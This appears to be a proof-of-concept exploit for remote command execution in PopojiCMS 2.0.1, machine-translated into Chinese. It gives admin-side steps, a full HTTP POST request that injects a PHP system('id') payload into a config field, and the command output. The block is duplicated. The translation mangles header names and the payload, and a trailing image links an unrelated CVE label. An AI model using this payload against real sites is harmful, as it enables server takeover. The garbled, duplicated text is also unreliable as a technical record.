#exploit title: popojicms版本: 2.0.1远程命令执行
#日期: 27/11/2023
#利用作者: TMRSWRR
#供应商homepage3360 https://www.popojicms.org/
#软件link: https://github.com/popojicms/popojicms/archive/refs/refs/tags/v2.0.1.zip
#版本:版本: 2.0.1
#测试在: https://www.softaculous.com/apps/cms/popojicms
## POC:
1)使用管理员登录并单击设置
2)单击config,将有效载荷写入元社会?php echo系统('id');
3)打开的主页,您将看到ID命令结果
post/popojicms9zl3dxwbzt/po-admin/route.php?mod=setTingAct=spersocial http/1.1
host: demos5.softaculous.com
cookie: _ga_yydpz3nxqq=GS1.1.1.1701095610.3.1.1701096569.0.0.0; _GA=GA1.1.386621536.1701082112; aefcookies1526 [aefsid]=3cbt9mdj1kpi06aj1q5r8yhtgouteb5s; phpsessid=b6f1f9beefcec94f09824efa9dae9847; lang=gb; demo_563=%7B%22sid%22%3A563%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9z L3DXWBZT%22%2C%22Adminurl%22%3A%22HTTP%3A%5C%2F%5C%2FDEMOS5.Softaculy.com%%5C%2FP OpoJicms9ZL3DXWBZT%5C%2FPO-ADMIN%5C%2F%2F%22%2C%22dir_suffix%22%3A%229ZL3DXWBZT%22%22%7D
用户代理: Mozilla/5.0(Windows NT 10.0; RV:109.0)壁虎/20100101 Firefox/115.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
REFERER: https://demos5.softaculul.com/POPOJICMS9ZL3DXWBZT/PO-ADMIN/ADMIN/ADMIN.PHP?mod=setting
content-type:应用程序/x-www-form-urlenceded
内容长度: 58
Origin: https://demos5.softaculous.com
DNT: 1
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
TE:拖车
连接:关闭
meta_content=%3C%3FPHP+ECHO+系统%28%27ID%27%29%3B+%3F%3E
结果:
uid=1000(soft)gid=1000(soft)组=1000(soft)uid=1000(soft)gid=1000(soft)组=1000(soft)
#日期: 27/11/2023
#利用作者: TMRSWRR
#供应商homepage3360 https://www.popojicms.org/
#软件link: https://github.com/popojicms/popojicms/archive/refs/refs/tags/v2.0.1.zip
#版本:版本: 2.0.1
#测试在: https://www.softaculous.com/apps/cms/popojicms
## POC:
1)使用管理员登录并单击设置
2)单击config,将有效载荷写入元社会?php echo系统('id');
3)打开的主页,您将看到ID命令结果
post/popojicms9zl3dxwbzt/po-admin/route.php?mod=setTingAct=spersocial http/1.1
host: demos5.softaculous.com
cookie: _ga_yydpz3nxqq=GS1.1.1.1701095610.3.1.1701096569.0.0.0; _GA=GA1.1.386621536.1701082112; aefcookies1526 [aefsid]=3cbt9mdj1kpi06aj1q5r8yhtgouteb5s; phpsessid=b6f1f9beefcec94f09824efa9dae9847; lang=gb; demo_563=%7B%22sid%22%3A563%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9z L3DXWBZT%22%2C%22Adminurl%22%3A%22HTTP%3A%5C%2F%5C%2FDEMOS5.Softaculy.com%%5C%2FP OpoJicms9ZL3DXWBZT%5C%2FPO-ADMIN%5C%2F%2F%22%2C%22dir_suffix%22%3A%229ZL3DXWBZT%22%22%7D
用户代理: Mozilla/5.0(Windows NT 10.0; RV:109.0)壁虎/20100101 Firefox/115.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
REFERER: https://demos5.softaculul.com/POPOJICMS9ZL3DXWBZT/PO-ADMIN/ADMIN/ADMIN.PHP?mod=setting
content-type:应用程序/x-www-form-urlenceded
内容长度: 58
Origin: https://demos5.softaculous.com
DNT: 1
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
TE:拖车
连接:关闭
meta_content=%3C%3FPHP+ECHO+系统%28%27ID%27%29%3B+%3F%3E
结果:
uid=1000(soft)gid=1000(soft)组=1000(soft)uid=1000(soft)gid=1000(soft)组=1000(soft)
![[CVE-2020-14644]-远程命令执行](https://hackhub.org/data/avatars/s/0/2.jpg){kind=small}
